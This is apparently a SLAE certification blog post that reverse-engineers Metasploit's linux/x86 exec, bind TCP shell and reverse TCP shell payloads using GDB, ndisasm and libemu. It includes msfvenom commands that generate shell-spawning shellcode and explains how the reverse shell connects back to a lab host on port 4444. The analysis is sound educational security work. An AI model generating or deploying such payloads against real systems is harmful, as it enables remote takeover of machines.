Assignment #5: Metasploit shellcode analysis
The fifth assignment for SLAE certification is about shellcode analysis and reversing.
Students were asked to take at least 3 shellcode samples created using Msfpayload for linux/x86, use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode, and present their analysis.
The assignment was written on Ubuntu Linux 18.04 with a 4.15 Linux kernel.
To list all the payloads msfvenom can generate, issue the following command:
From the list, I selected:
- bind TCP shellcode
- reverse TCP shellcode
GDB in action on linux/x86/exec payload
To see all possible options, the following command line can be used:
We need CMD parameter, that we can set to “/bin/sh”.
I copied the msfvenom output to a skeleton C program:
After compiling the program, I started it and broke execution at the line where control is passed to the content of the code buffer.
The shellcode starts by pushing the execve(2) system call number onto the stack and then popping it into the EAX register.
0x00402020 <+0>: push 0xb
0x00402022 <+2>: pop eax
Then we convert the double-word value in EAX into a quadword using the CDQ instruction. CDQ copies the sign (bit 31) of the value in the EAX register into every bit position in the EDX register.
0x00402023 <+3>: cdq
The registers just before the cdq instruction. As we can see EAX contains the execve call number as expected.
(gdb) info register
eax            0xb          11
ecx            0x0          0
edx            0xb7fb7890   -1208256368
ebx            0x401fd4     4202452
(gdb)
After the cdq instruction, we can see edx is 0:
(gdb) info register
eax            0xb          11
ecx            0x0          0
edx            0x0          0
ebx            0x401fd4     4202452
So cdq can be a clever way to zero the EDX register without the XOR technique, provided we are sure EAX holds a non-negative number (bit 31 clear).
We then push EDX (which is zero) onto the stack, followed by 0x632d (“-c”), preparing the execve parameters.
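To make the sign-extension rule concrete, here is a minimal Python sketch of what CDQ does to EDX. The function name `cdq` is mine, chosen for illustration; it only models the register semantics described above and is not taken from any tool.

```python
def cdq(eax: int) -> int:
    """Return the EDX value that CDQ would produce for a 32-bit EAX."""
    eax &= 0xFFFFFFFF            # keep only the low 32 bits
    sign = (eax >> 31) & 1       # bit 31 is the sign bit
    # CDQ copies the sign bit into every bit of EDX.
    return 0xFFFFFFFF if sign else 0x00000000


print(hex(cdq(0xB)))          # EAX = 11 (execve): EDX becomes zero
print(hex(cdq(0x80000000)))   # bit 31 set: EDX becomes all ones
```

The second call shows why the trick only works as a "zero EDX" shortcut when bit 31 of EAX is clear.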
After some more pushes, the stack situation is the one described in this screenshot.
Using python to decode the hex values stored, it’s easy to see it’s “/bin/sh -c”
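The decoding step can be sketched like this. Only 0x632d comes from the analysis above; the two double words for "/bin" and "/sh" are values I am assuming here, since they are what would produce the “/bin/sh” string seen in GDB.

```python
import struct

# Values in push order; the last value pushed ends up at the lowest address.
pushes = [
    ("<I", 0x00000000),  # push edx (EDX is zero): terminator after "-c"
    ("<H", 0x632D),      # push word 0x632d -> "-c" (from the analysis above)
    ("<I", 0x0068732F),  # assumed value: "/sh" plus a NUL terminator
    ("<I", 0x6E69622F),  # assumed value: "/bin"
]

# The stack grows downwards, so memory order is the reverse of push order.
memory = b"".join(struct.pack(fmt, value) for fmt, value in reversed(pushes))

# Split on NUL bytes to recover the C strings stored on the stack.
strings = [chunk.decode("ascii") for chunk in memory.split(b"\x00") if chunk]
print(strings)
```

Packing with `<` (little-endian) matters: x86 stores the least significant byte first, which is why the hex values look reversed compared to the text.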
We then move the ESP value into EBX, preparing the first argument (the filename) for the execve(2) system call.
Right before the INT 0x80 that will eventually execute execve(), the situation is the following:
(gdb) info registers
eax            0xb          11
ebx            0xbfffee3e   -1073746370
ecx            0xbfffee2e   -1073746386
edx            0x0          0
esp            0xbfffee2e   0xbfffee2e
ebp            0xbfffee68   0xbfffee68
Let’s recall the execve(2) prototype, as found on my Ubuntu system based on a 4.15 Linux kernel.
#include <unistd.h>
int execve(const char *filename, char *const argv[], char *const envp[]);
While EAX holds the execve(2) call number, EBX (the first execve parameter) points to the following string:
(gdb) x/s $ebx
0xbfffee3e: "/bin/sh"
ECX, that is the second execve() parameter, points to a memory region containing the arguments for the program that is going to be executed:
(gdb) x/4xw $ecx
0xbfffee2e: 0xbfffee3e 0xbfffee46 0x0040203d 0x00000000
(gdb) x/s 0xbfffee3e
0xbfffee3e: "/bin/sh"
(gdb) x/s 0xbfffee46
0xbfffee46: "-c"
(gdb) x/s 0x0040203d
0x40203d <code+29>: "/bin/sh"
The “call” trick
The payload generated by msfvenom uses a clever trick to get the address of the command to be executed onto the stack.
When a CALL instruction is executed, the program passes control to the given address and pushes onto the stack the address of the instruction right after the call itself (the return address), 0x0040203d in our case.
The bytes at this address are nothing more than the “/bin/sh” string.
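The arithmetic behind the trick can be checked with a short Python sketch. The byte string below is what I assume msfvenom emits for linux/x86/exec with CMD=/bin/sh (the post does not show the raw bytes), and `BASE` is the buffer address from the GDB session above.

```python
import struct

BASE = 0x00402020  # address of the code buffer in the GDB session above

# Assumed raw bytes of linux/x86/exec with CMD=/bin/sh (43 bytes).
shellcode = bytes.fromhex(
    "6a0b 58 99 52 66682d63 89e7 682f736800 682f62696e 89e3 52"
    "e808000000"          # call +8
    "2f62696e2f736800"    # "/bin/sh\0" embedded right after the call
    "57 53 89e1 cd80"
)

call_off = shellcode.index(b"\xe8")                    # offset of the CALL opcode
rel32 = struct.unpack_from("<i", shellcode, call_off + 1)[0]

ret_off = call_off + 5           # CALL rel32 is 5 bytes long
ret_addr = BASE + ret_off        # this is the value CALL pushes on the stack
target_off = ret_off + rel32     # where execution actually continues

end = shellcode.index(b"\x00", ret_off)
pushed_string = shellcode[ret_off:end]

print(hex(ret_addr), pushed_string, target_off)
```

The return address lands exactly on the embedded string, while execution resumes past it, so the string is never run as code.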
Back to our registers, EDX is NULL.
So when INT 0x80 is called, the following command is executed: “/bin/sh -c /bin/sh”.
The Metasploit shellcode is built to be independent of the command the user asks for, so a first shell is spawned with the ‘-c’ argument, which tells the shell to execute the string passed as the parameter value, “/bin/sh” in our case.
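The three execve arguments can be sketched as a small Python helper. `build_exec_args` is a hypothetical name of mine; it only mirrors the layout seen in the registers (EBX, ECX, EDX) and does not execute anything.

```python
def build_exec_args(cmd, shell="/bin/sh"):
    """Return (filename, argv, envp) as the shellcode lays them out."""
    filename = shell              # EBX: path of the program to run
    argv = [shell, "-c", cmd]     # ECX: NULL-terminated pointer array in the real code
    envp = None                   # EDX: NULL, no environment is passed
    return filename, argv, envp


print(build_exec_args("/bin/sh"))
print(build_exec_args("id"))
```

Only the last element of `argv` changes with the user's CMD, which is what makes the payload independent of the command.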
ndisasm in action for linux/x86/shell_bind_tcp payload
With the following command we create a TCP bind shellcode listening on port 4444 and pipe it to the ndisasm tool to get a disassembled listing.
msfvenom -p linux/x86/shell_bind_tcp -a x86 --platform linux -f raw | ndisasm -u - > bind_tcp.ndisasm
Let’s examine it syscall by syscall.
In the first block of code, EBX is set to zero, and then EAX is zeroed too as a result of the mul instruction, which multiplies EAX by EBX and stores the result in EDX:EAX.
Zero is pushed onto the stack, then EBX is incremented and the value 1 is pushed, and right after that the value 2 as well.
The stack now looks something like this:
        |-----|
ESP --> |  2  |
        |  1  |
        |  0  |
        |-----|
ECX points to this data structure and AL is filled with 0x66, that is 102 in decimal. 102 is the number of the socketcall() system call.
socketcall() was used in older Linux kernels as the single entry point for networking-related APIs. In newer kernels, as you can see from my solutions for assignments 2 and 3, the relevant socket APIs have their own system calls.
From the man page:
The first parameter, which is stored in EBX register, defines the API to call. EBX in this case contains the value 1, that is the socket() call.
So this snippet of code is calling the socket(2) system call, passing the parameters pointed by the ECX register (2, 1 and 0).
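The dispatch done by socketcall() can be pictured as a lookup on EBX. This is only an illustrative Python sketch: the table lists the first five call numbers from the kernel's linux/net.h, and `describe_socketcall` is a name I made up.

```python
SYS_SOCKETCALL = 0x66  # 102, the system call number stored in EAX

# First five socketcall() sub-calls, as defined in linux/net.h.
SOCKETCALL = {
    1: "socket",
    2: "bind",
    3: "connect",
    4: "listen",
    5: "accept",
}


def describe_socketcall(eax, ebx):
    """Name the socket API selected by the EAX/EBX pair."""
    if eax != SYS_SOCKETCALL:
        raise ValueError("EAX does not hold the socketcall() number")
    return SOCKETCALL[ebx]


print(describe_socketcall(0x66, 1))
```

The same table is handy for the rest of the analysis, since the bind shellcode walks through EBX values 1, 2, 4 and 5.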
The socket(2) prototype says that 2, 1 and 0 are domain, type and protocol respectively.
So, it’s like we’re asking the operating system to do this for us:
This means, “please open an IPv4 socket for us, of the stream type, which provides sequenced, reliable, two-way, connection-based byte streams, and use the default protocol for it (TCP)”.
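As a quick cross-check of the three values, here is the same request made through Python's socket module. It is a sketch that assumes a Linux host, where AF_INET is 2 and SOCK_STREAM is 1.

```python
import socket

# Same request as the shellcode: domain=2, type=1, protocol=0.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

# Read back the numeric values the kernel was given.
args = (int(s.family), int(s.type), s.proto)
s.close()

print(args)
```

Protocol 0 lets the kernel pick the default protocol for a stream socket on IPv4, which is TCP.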
The second syscall
The second system call invocation is:
Again this is a socketcall() invocation, because of the value 0x66 in the EAX register. EBX is set to 2 (bind), since it is the first value popped off the stack. We are then binding to a given port the file descriptor opened by socket(2), which was returned in EAX and is pushed on the stack as the first argument.
We push a double word on the stack, 0x5c110002, which can be split into two separate words:
- 0x5c11, the TCP port we have to bind to: on little-endian x86 its bytes land in memory as 0x11 0x5c, which read in network byte order is 0x115c, that is 4444 in decimal
- 0x0002, the AF_INET constant, used as sin_family
The 0x10 is then 16, the length in bytes of the struct sockaddr_in data structure.
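The byte-order detail is easy to verify in Python. This sketch packs the pushed double word the way x86 stores it and then reads the two fields back; the variable names are mine.

```python
import struct

# push dword 0x5c110002 stores the least significant byte first.
raw = struct.pack("<I", 0x5C110002)

family = struct.unpack_from("<H", raw, 0)[0]  # sin_family, host byte order
port = struct.unpack_from(">H", raw, 2)[0]    # sin_port, network byte order

# A full sockaddr_in: family, port, 4-byte address (0 = any), 8 bytes of padding.
sockaddr_in = raw + struct.pack("<I", 0) + bytes(8)

print(raw.hex(), family, port, len(sockaddr_in))
```

Reading the port with `>H` (big-endian) is what turns the bytes 0x11 0x5c into 4444, and the total structure size matches the 0x10 pushed as the address length.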
Calling the INT 0x80, we’re executing the following piece of C code:
The third syscall
The third call is pretty easy to understand. The EBX register is set to 4, that is the code for listen(2).
The listen(2) prototype is:
The fourth syscall
The fourth system call is just 3 lines of assembler.
We increment EBX, which becomes 5, and we invoke socketcall() again. This translates into calling accept() on the given socket descriptor.
The fifth syscall
After accept() returns, the dup2() system call is invoked, since the value 0x3f (63) is stored in EAX.
The call is in a loop because we want to duplicate the connected socket onto standard input, output and error, which are mapped to file descriptors 0, 1 and 2.
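The loop can be sketched in Python as follows. I am assuming the counter runs downwards from 2 to 0; the `dup2` parameter is injectable so the demo can record the calls instead of really replacing this process's standard streams, and the descriptor number 7 is made up.

```python
import os


def redirect_std_fds(sock_fd, dup2=os.dup2):
    """Duplicate sock_fd onto stderr, stdout and stdin, in that order."""
    for fd in (2, 1, 0):      # assumed order: counter decremented until negative
        dup2(sock_fd, fd)


# Demo with a recorder, so nothing is actually redirected.
calls = []
redirect_std_fds(7, dup2=lambda old, new: calls.append((old, new)))
print(calls)
```

After the three calls, anything the shell reads or writes goes through the socket instead of the terminal.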
The last call
The last call is the execve() that will serve the incoming connection on port 4444.
First of all, “/bin//sh” is stored on the stack with two push instructions.
Then the chain of arguments for execve() is built, with pointers to the memory region storing the command to be executed, and finally the last int 0x80 is called.
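The doubled slash is there so the path fills exactly two double words. Here is a small Python check; the two hex constants are the values I assume the two push instructions carry, since the post does not list them.

```python
import posixpath
import struct

# Assumed operands of the two pushes, in memory order (lowest address first).
path = struct.pack("<II", 0x6E69622F, 0x68732F2F)

print(path, len(path))
print(posixpath.normpath(path.decode("ascii")))
```

"/bin/sh" is 7 bytes, so padding it to 8 with an extra slash avoids a NUL byte inside the pushed values, and the kernel resolves both spellings to the same file.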
libemu in action on linux/x86/shell_reverse_tcp
We start by creating a raw shellcode for a TCP reverse shell.
msfvenom -p linux/x86/shell_reverse_tcp -f raw -a x86 --platform linux -o reverse_shell.raw
Using the raw shellcode, I’ll call sctest in order to analyze the emulated output.
Just from the bare sctest output, we can infer that this shellcode is related to networking. It tells a story about a socket, a connect somewhere, duplicating standard input, output and error on a file descriptor and then executing “/bin/sh”.
Let’s add a bit more verbosity.
From the pseudo C code at the end of the output, we can see that a TCP socket has been opened and the new file descriptor is used to duplicate standard input, output and error.
Then there is a connect to port 4444 on IP address 172.16.202.164, which is the address of my Linux VirtualBox machine, and a final execve of /bin/sh on the connected socket.
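To relate the address and port reported by sctest to what one would expect inside the raw bytes, here is a short Python sketch. It only does the byte-order arithmetic; I have not extracted these values from the payload itself.

```python
import socket
import struct

ip_bytes = socket.inet_aton("172.16.202.164")   # network byte order
port_bytes = struct.pack(">H", 4444)            # network byte order

# How the 4 address bytes would read as a little-endian push operand.
ip_as_dword = struct.unpack("<I", ip_bytes)[0]

print(ip_bytes.hex(), hex(ip_as_dword), port_bytes.hex())
```

Searching a disassembly for the resulting double word is a quick way to spot where a reverse shell's destination address is embedded.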
What I’ve learnt
I have to admit, other assignments were more exciting because there was some coding to do. However, reversing code is interesting because you can learn some clever coding techniques.
In these specific analyses, the most interesting techniques I’ve learnt are:
- using the cdq instruction, after setting the EAX register to a non-negative value, to initialize EDX to zero
- using CALL to jump over data embedded in the middle of the shellcode, so that the address of the “/bin/sh” string is pushed on the stack
SLAE Exam Statement
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-1217